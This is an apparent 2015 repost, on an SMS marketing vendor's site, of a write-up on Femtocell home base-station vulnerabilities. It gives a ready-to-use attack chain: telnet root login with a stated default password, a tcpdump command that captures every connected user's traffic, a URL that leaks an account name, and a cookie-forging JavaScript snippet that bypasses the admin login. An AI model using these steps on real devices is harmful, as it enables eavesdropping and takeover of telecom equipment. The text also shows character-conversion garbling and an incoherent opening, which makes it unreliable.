家庭基站Femtocell截獲任意短信漏洞,危及公眾移動(dòng)通信安全
發(fā)布時(shí)間 :2015-11-23
來(lái)源 :
移動(dòng)互聯(lián)網(wǎng)發(fā)展到帳用戶(hù)對(duì)短信、通話、數(shù)據(jù)流需求劇增,轉(zhuǎn)向互動(dòng)任意短信需求,而Femtocell設(shè)備可以被改造成偽基站短信群發(fā)器,截取家庭任意短信隱私,移動(dòng)短信安全通信漏洞凸顯。
近日,有部分運(yùn)營(yíng)商通報(bào)Femtocell雖能瞬間解決室內(nèi)ip網(wǎng)絡(luò)覆蓋問(wèn)題,但是漏洞問(wèn)題百出,很多廠家已經(jīng)對(duì)全網(wǎng)設(shè)備進(jìn)行緊急修復(fù),漏洞暫時(shí)已經(jīng)修復(fù)完成,但是漏洞問(wèn)題還會(huì)存在嗎?
樂(lè)信揭秘Femtocell任意漏洞三大細(xì)節(jié):
①root弱密碼
可以直接telnet登錄,然后就是一個(gè)擁有root權(quán)限的Linux shell了。
$ telnet 192.168.197.1
login: root
password: 5up
順便提一句,這個(gè)密碼應(yīng)該是Atheros的參考設(shè)計(jì)板PB44的默認(rèn)密碼,很多廠商拿來(lái)都不改。在搜索引擎上以"5up"和"root"為關(guān)鍵詞,可以搜索到不少有趣的東西。
并且發(fā)現(xiàn)上面的busybox基本沒(méi)有裁剪,甚至連tcpdump功能都有。
于是,可以直接抓取到所有連上此WiFi的流量:
busybox tcpdump -i br0 not port 23
② 其它利用方式
/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
閃燈 /mnt/flash/led_ctrl.sh [on|off]
③ RF 板卡滲透:Web 登錄繞過(guò)
訪問(wèn) http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 獲得用戶(hù)名為
abmoc@24320
然后在USER.js里發(fā)現(xiàn)原有的登錄繞過(guò)問(wèn)題沒(méi)有得到修復(fù),于是在瀏覽器中打開(kāi)Console,輸入以下腳本即可登錄:
SetCookie('role', 'marketUser');
SetCookie('username', 'abmoc@24320');
SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
document.cookie = "loginFlag=1;";
window.top.location = 'main.asp?r=' + Math.random() + '#index';
登錄之后,我們就擁有了與運(yùn)營(yíng)商派過(guò)來(lái)開(kāi)站的工程師完全一樣的操作權(quán)限!
推薦閱讀
- 中國(guó)移動(dòng)常用短信查詢(xún)代碼-查話費(fèi)/查流量 2023-11-21
- 快遞常見(jiàn)的機(jī)票/火車(chē)票/汽車(chē)票/船票出票短信群發(fā)模板(近幾年飛機(jī)··· 2024-04-08
- 銀行常見(jiàn)的信用卡邀請(qǐng)短信模板 2024-04-08
- 餐飲訂餐短信告知大全 2017-06-19
- 學(xué)校手機(jī)短信中心號(hào)碼是多少?電信、聯(lián)通、移動(dòng)短信中心號(hào)碼設(shè)置··· 2023-11-21
- 物流短信通知提醒客戶(hù)取件常用模板 2023-10-30
最新閱讀
- 政企必看!!樂(lè)信短信平臺(tái)2025簽名新規(guī)范 2025-03-27
- 告別低效推廣!短信群發(fā)平臺(tái)如何提升客戶(hù)轉(zhuǎn)化率300%? 2025-04-24
- 短信群發(fā)可以發(fā)送哪些短信內(nèi)容?群發(fā)平臺(tái)服務(wù)合規(guī)指南 2025-04-15
- 免費(fèi)短信群發(fā)有多坑?寧可勸退客戶(hù)也不做免費(fèi)短信群發(fā) 2025-04-08
- 節(jié)日營(yíng)銷(xiāo)短信翻車(chē)實(shí)錄:從投訴爆雷到逆風(fēng)翻盤(pán)實(shí)戰(zhàn) 2025-04-03
- ?個(gè)貸機(jī)構(gòu)短信觸達(dá)陷阱:誰(shuí)在悄悄攔截你的客戶(hù)? 2025-03-28